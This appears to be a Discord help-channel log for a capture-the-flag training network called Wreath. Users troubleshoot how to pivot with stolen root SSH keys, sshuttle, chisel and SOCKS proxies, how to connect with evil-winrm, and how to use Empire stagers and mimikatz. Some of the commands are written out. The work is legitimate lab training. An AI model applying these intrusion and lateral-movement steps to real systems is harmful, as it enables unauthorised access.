it just isnt the same file

any ideas?

https://askubuntu.com/questions/823883/ctrl-v-ctrl-c-in-terminal

If I understood you correctly, you try to mark a terminal line and ctrl+c it?

you cant CTRL+C && CTRL+V

No, im copying the id_rsa from the server, pasting it into my own machine and it doesnt work

How are you copying it?

and how are you pasting

ctrl shift c ctrl shift v

and from where (shell, rdp) ?

this is the error

shell

yes thats what I thought

the link I shared tells you this

try it out with copy some marked line in the shell and ctr + v it into an editor of your choosing

see what you get

you need to CTRL+SHIFT+C

this is what i ve been doing, man

and CTRL+SHIFT+V

and after that chmod the file with 600

my guess is that the file isn't copied correctly even if it is the same

.

there may be newline issues

either one too many or one missing at the end

check if the output is the same you have the file locally and on the server

check that line endings are LF and not CRLF, as well

it is

chmod is set?

yes

i have no idea how to check that

is there a way to just transfer the file?

i tried scp, simplehttpserver, simple.http, curl, everything

hrmm I would simply remove the file and copy it anew check to make sure that you dont get any random chars or empty lines from copying

HEXEDITOR

e.g.

i am done for today with this room i will try again tomorrow if it doesnt work i will quit it

a ctrl c defeats me

For task 21, I created the user and confirmed that the user is in admin and remote management users group. But when I tried to connect from my attacking machine to the .150 host via evil-winrm and xfreerdp, both seems to be failing. The error shows connection timeout

Anyone can help? Can I not connect directly from my attacker machine to the .150 host?

nope

you'll have to proxy through the web server

I just did that, and still failing

Mind if I DM you?

not terribly available atm,

sorry

Aight, np

you can post here though

Oh I can? Thought I shouldn't lol

this is the help channel for wreath 🙂

you'll have to proxy through the web server
So I setup my proxy using ssh -D 1337 root@10.200.93.200 -fN -i id_rsa

Then attempt to evil-winrm into .150 host using evil-winrm -u user -p pass -i 10.200.93.150

Still not working hmm

try sshuttle or chisel

you may need to pop a hole in the firewall

and you'll need to setup proxychains if you use chisel

read the course material, it'll help you get started 🙂

notably the section on pivoting

oops

seems like im no longer able to access the prod-serv (first machine) after i tried to socat

Hello!
I'm stuck at the pivoting part to server3.
I open the port in firewall

Open chisel as server running the open port

And after that open chisel as client in my kali machine on the port 9090

Configure the foxyproxy(proxy 127.0.0.1:9090), and it's not working ...

I don't know what I'm doing wrong

Solved ^^

Also: How can I be connected to vpn and also use google? This drive me crazy that I have to switch over and over again between kali and windows ...

I saw that AttackBox doesn't have this problem

Most probably it's a setting or someting

Don't use the Kali VPN client, use the openvpn command line.
There's also a checkbox somewhere in the Kali network manager for the VPN

I'm using openvpn cli but it's the same like kali VPN client

The problem persist in both ways ...

It shouldn't.
Check the routing table, make sure there aren't bad routes being added.

Hmm, let me see

Routes are the same like in AttackBox...
But what I've said, there i can access machines and also use google, or other sites in the same time.
In my machine with vpn active, I can access only machines, that's all

If you drop into #site-support, that would be a more appropriate place to ask

Thank you so much! I will

hey guys... so it is not only me, right ? i can't access the machine with openvpn

use the wreath vpn

no, i was using it

regenerating it solved the issue

thanks

sshuttle is working, thanks for the help!

Gave +1 Rep to @stoic flicker

I'm trying Task 29, but when I execute it in powershell the stager returns powershell.exe : Invoke-Expression : Cannot bind argument to parameter 'Command' because it is an empty string.
and when I try to execute it through burpsuite with the RCE exploit it wont work either

does anyone know a fix / what I'm doing wrong?

I put the php files etc on the prod-server and I made a php listening port there

you used the stager generated by empire and not the one on the task, yes?

yeah

I generated it in empire with http-hop as listener

might be some quotes shenanigans in the RCE then?

well atleast not in the exploit / stager, as the exploit works fine but I don't know how to test the stager

guess I'll just fire up a local windows VM to test it

hey! just started doing wreath again and got until the part with the hop listener. Thats when my network time expired and now I cant connect to any host in the network anymore. Pinging any machine doesnt get any response and ssh doesnt work as well. Already regenerated my VPN pack, rebooted kali and voted for reset but so far nothing. Is there anyone who can help?

Guy's Hello!
Trying to continue WREATH, but i can't connect to prod-serv (.200) and to git-serv (.150). Already connected to the Wreath VPN
Could you help me with it?

sshuttle
ssh: connect to host 10.200.94.200 port 22: No route to host
c : fatal: c : failed to establish ssh session (2)

same problems

@golden spoke Seems that Im on the same subnet as you, I also cant connect

Would be nice if someone could reset the network

@merry robin @oblique crag Could you guys please help us out?

Sorry guys @stoic flicker @strange bison but maybe you can help us with that problem please?

Please don't ping the admins for that @gilded grove

No

Nice support, very helpful

sorry, not terribly available atm

We are not paid to help you. Everyone here is a volunteer.

I'd say check that you aren't on another VPN

otherwise vote for a reset, don't think I can help beyond that, sorry

wreath only (

I'm just a user like you are, no special access

Reset (3/8) need 5 more votes

hmm okay, but thanks anyway!

Gave +1 Rep to @stoic flicker

Not sure how sshuttle works, but maybe check that you have the right key configured?

• It works well now. Network was restarted

@gilded grove try to use

It's good, thank you

Gave +1 Rep to @stoic flicker

👍

guys this shows an error while executing listener on empire

this is the info of the listener

There's already a listener with that name, it looks like.

Does anyone know if there is an issue with the private key coz im having issues ?

There can be, if someone changed it

I thought so to but the box was reset and i tried it again still same issue

@silver jewel, what's the issue?

I mean the error...

I basically keep getting an error when trying to ssh into the webserver with the private key... apparently the key is invalid..i forgot the exact error message

@steady swan

Hmm

How can I help without knowing the error?

Did you do chmod 600 id_rsa?

And one more thing, did you get id_rsa or id_rsa.pub?

@silver jewel

Anyways. Ping me when you come back

I got id_rsa.....and yes i changed permissions @steady swan

So what's the error?

You remember atleast a word?

Of the error?

@silver jewel

Do you go away every 30 seconds and come back after 30 minutes? Lol

Sorry about that..i am spinning up my kali box @steady swan

I see

Ping me when you come back

I might be able to help you as I completed Wreath about 4 days ago

So the error is load key "id-rsa" invalid format....im not sure how exactly its invalid since i also confirmed with darks video and they are practically the same @steady swan

Just retry downloading it

Or try renaming it

I tried...about five times still got nothing @steady swan

Hmm

Reset the machine?

Maybe?

When i tried it the machine was just reset at that time @steady swan

Which machines key are you getting?

I mean the hostname?

First of all. Tell me how you downloaded it?

Using?

I copy pasted it

How? I mean the command?

Cat?

Or nano?

Cat

Hmm I see

This??

You are attacking .200 right?

Naah..the webserver

Bro. Seriously?

You have to get root SSH keys for the prod server thing

Not the git server

Yeah..i got it at /root/.ssh

Machine name?

Git serv or prod serv?

Prod

You just told me git server

Ooh..sorry..

Hmm

How did you get in?

Webmin RCE?

Webminrce then revshell

Do you have a stable shell?

Yeah

Can you send a screenshot?

Cool..lemme dm you the pic then

Sure

@silver jewel you might need to convert the key if you have a different openssh version

How exactly does a different openssh version affect it? @pallid vapor

if you're getting invalid id_rsa key format, make sure it has a blank line at the end of the file, and no blank lines or spaces at the start.

i believe they might have changed the format

i had that issue once

It should be backwards compatible

¯_(ツ)_/¯

my issue is i had a too new openssh i think?

Yeah, but should be backwards compatible.

¯_(ツ)_/¯

i dony know it was a while ago

I had that issue as well, and then I recopied the key and it was fine. you can probably set up an http server that can upload files on your attacking machine and curl it over

check the line endings, and that there's a newline at the end

I fixed the issue

You just have to download the key instead of copy pasting it

You can copy paste it, but ok

I tried copy pasting but didn't work for me

It's finicky

@real shuttle

ok then

👀

anyone having issues with the network?

nvm got it

I'm in task 6, is it just me or is the id_rsa empty? pretty sure it's not supposed to be

Shouldn't be, someone might have been a terrible person

could be why there's 3 votes for a reset

It wasn't empty

That was 13 hours ago, the network reset

There are many different instances of the wreath network, so not everyone is on the same subnet. A reset for one won't affect the others.

Thanks for the clarification, I'm not very familiar with how the networks work. The file was empty on the instance I'm on but after a reset everything was perfectly fine.

Gave +1 Rep to @dry pendant

Glad to hear it :).

The third octet in the IP is which network you are on. There's usually something like 10 or so people that share that network with you

Oh, I thought it'd be a lot more for some reason

I could be wrong. I think it says somewhere on the page

the number of votes needed to reset is related to the number of current users. Not sure if it's the same number or not

Didn't see anything about that, but I must admit I was too excited to get on with it

Wreath is the only network I've done, but it's definitely one of (if not THE) best rooms I've done

It does seem like a lot of fun and very educational

Hey @merry robin, just curious when do you plan to update task 4 to include the links to the reports?

Is there any problem with the machine?

.200

is not reachable for some reason

I do not see the option to start/extend/reset was anything changed on that side?

@burnt pike

did you try in another browser?

have not, ill try

ah same issue

brave/firefox

on kali

hello

i am getting this error in sshuttle

while trying to do this

Did you include the -x flag along with the ip of the compromised machine?

which command are you reffering to

sshuttle

sshuttle -r root@ip --ssh-cmd "ssh -i private_key" ip

-x for exclude a certain ip

Try and exclude the ip that you use in the root@ip

okay lets see

Also that “ip” you put at the end should be a subnet, not just the ip

at first it worked with only the ip let me see if i have a screenshot for that

Hi, I lost my connection with my reverse shell in the task 6, and now I can't made the exploit run again....
Failed to connecto http://....

what should i do?

Since I cant restart the network just for me

Fixed!

It's up running again 🙂

fixed???

Hey ! Can anyone help me with this funny issue I am having :

Have you joined Wreath network?

Yes I have joined the room

I am on a 34 day streak even

I actually downloaded the VPN file once before

But at one point my OS crashed

Try leaving Wreath room and joining again.

Okay

Thanks Man. It worked !

Is anyone else having issues connecting to the final machine? I'm literally following the walkthrough verbatim and not getting a connection. Specifically Task 21 -- not able to make a connection but my tunnel is working.

I can connect

But the mimikatz part seems corrupted

Hmm. Frustrating because I’ve used Evil-WinRM many times without issues but acting up here. Perhaps I’ll just wait for a reset next year 👻

Thanks for validating. I could regen a VPN key too I suppose.

Fantastic room FWIW. Probably the best I’ve seen on THM.

Anyone else get this error?

Same with xfreerdp?

@indigo beacon also not allowing me to make the connection

I just jumped over to Attacktive Directory to make sure I'm not doing something wrong and Evil-WinRM works fine.

If everything is fine then winrm or rdp should not be acting up

Try creating another user?

Already did, same issue :/

And I'm able to get a reverse shell as intended from that final machine to the .200 machine.

I guess I can try uploading a nc.exe binary and get a shell that way?

Probably will get flagged though.

When you say .200 you mean relay through .200 to your machine?

Yeah, I guess spoilers aren't an issue since it's a walkthrough room. I got the PowerShell reverse shell on .200 using the GitStack exploit. Created the user as instructed with proper permissions, and when I try to RDP or use winrm just stalls out

May be a dumb question, but the IP we are connecting to is the Windows machine's IP, no? For WinRM and RDP.

Yeah, windows

Okay, couldn't see any other way. May just have to wait for a reset.

Are you using sshuttle?

Yeeep

Welp gotta wait for the reset 🥲

haha yeah, thanks for the support regardless

i cant ping machine

even scan

but dns work and i can see the page

why?

any help?

it probably doesnt respond to ICMP

(It should respond to ICMP)

i can see the webpage the redirect to a domain after to add to host file

but i can not scan it

Hi everyone, I am on task 18 for Git Server: Pivoting. I am trying to complete the first task of using sshuttle to get into the network. I was able to RCE into the machine and grab the id_rsa of root.

But when I run the command sshuttle -r root@10.200.81.200 --ssh-cmd "ssh -i id_rsa" 10.200.81.0/24 -x 10.200.81.200 I am getting "Permission denied" .

I also tested by using sudo ssh 10.200.81.200 -i id_rsa and I am getting the same result.

I already did chmod 600 id_rsa to set the id_rsa file to be read/write.

Let me know if what you guys think I should do. Kinda stuck on this for last 2 days.

Does it say invalid key or something? If yes then try adding 1 or 2 new empty lines at the end of id_rsa key. Also, verify your account so you can send screenshots here.

Thanks I'll try that in a bit and let you know. Thank you

Try giving the private key a different name

Anyone able to help with this error? Task 21, gives error instead of the expected output

@indigo beacon when you spawned cmd, make sure you ran it as administrator

if you run it in a low integrity level (ex. a normal user who has local admin perms, but doesn't have the admin permissions invoked), mimikatz will fail

simple fix, right click cmd, run as admin

Omg thank you

I completely forgot about that 🤦‍♂️

i have joined the wreath network room but when i go to vpn access page to download the pack it says you dont have access to any network

what can be the issue?

Try leaving Wreath room and joining again.

how to leave a room?

Click on options > leave room

Ok thanks

hello im new here. hope im welcome

Everyone is welcome 🙂

If you're new to THM, I recommend #start-here . Also, verifying with the bot is helpful. See the link below:

!docs verify

Performing Task 18: Pivoting in the room

Getting the following error, even though port 22 is open on the mentioned IP:

sshuttle -r root@10.200.105.150 --ssh-cmd "ssh -i id_rsa" 10.200.105.0/24 -x 10.200.105.150
ssh: connect to host 10.200.105.150 port 22: No route to host
c : fatal: c : failed to establish ssh session (2)

Any idea why this is occuring?

@strange ibex That's the wrong ip

Also the subnet

@indigo beacon every user doesn't get the same IP and subnet, if I'm not wrong

Lat octet should be the same for the machines though

error fixed, it occured bcoz the network was resetting -.-

Hii

hey @shut elm

In this room everyone is in the same network so same IPs

Actually no, there are many instances of the network. The overall layout is the same, so the last octet (200, 150, 100) stays the same, but the third octet will change from person to person.

Does anyone else run into issues downloading the Website.git directory? Everytime I try to do it my VM freezes up and then it errors out with "Error Download failed..." and also an authorization error for evil-winrm.

NVM I just said screw it and zip'd the original folder to my user desktop and downloaded from there

That doesn't sound true considering this ss, and I've seen other users exploits, etc.. in these machines

yes, they're shared with other users but it's like 10 people to a network.

You do not share a network with the hundreds or thousands of other users in Wreath at the moment, just a small number.

Ohh okay, was confused a bit there

@strange bison Thanks for clearing the air

Gave +1 Rep to @strange bison

Generally, community mentors and mods are more familiar with how stuff works behind the scenes. I think Wreath specifically states how many people share a network at the start?

Either it doesn't or I can't read 👨‍🦯

The only indicator I saw is in the vote count for reset. I don't know if that's the exact number of people in the room, or a percentage, or what

But yeah, I think it's roughly 10 people per instance, at least from what I saw when I did wreath. I could be way off.

20%

It's currently set to either 35 or 40 per network. Can't remember which

Might even have been dropped to 25

my suspicions were correct, then :). I guessed it was a percentage

Its showing connected to the wreath network still not getting any ping response, need help

Having the same problem. Anything on how you solved it?

Network resetted, no ping results

anyone having the same problem?

For me, it just doesn't respond to ICMP...

nvm it does

i am not able to find any solution

but there is one thing very weird , that there are many tun ips like tun0,tun1,tun2,...etc

Well there's your problem

!multivpn

okk thanks

@strange bison

after killing all

then again i did ps aux | grep open vpn

still it shows the same number of processes

I am trying manually

worked

Unable to create new listtener on starkiller

facing this issue while installing empire

Hello,

There is a problem with wreath room, because i can't to run the exploit
and i tested with the arg --force, i have the shell but i can't run the commands except "exit", so i tested to "concat" multiple commands but not result 😦
Can you help me please ?
If someone answer me, can you ping me please. Thanks

--force doesn't mean you have a shell, @sacred linden -- it just means that it skipped the bit where it checked if it was possible to get a shell and jumped to trying (and failing) to execute commands.

Can you access the website?

yes

Can you access port 10000?

-unmute @sacred linden Accidental raid protection trigger

🔊 Unmuted Shydoow#4449

thanks

Np

If you can access port 10,000 then the exploit should work. What's it giving you?

(You can screenshot now, but verify properly when you can)

sorry, i executed the exploit on this port and it's failed.

Are you sure you're in the 72 subnet?

Not least because that network is not active

I'm in the vm THM

Screenshot the network map at the top of the room

i follow the video when i saw that doesn't work

And i can ping this ip : 10.200.54.200, so i don't understand 🤔

You're attacking the wrong IP in your screenshot

Target 10.200.54.200, not 10.200.72.200 @sacred linden

OMG 😅 ! Thanks you very much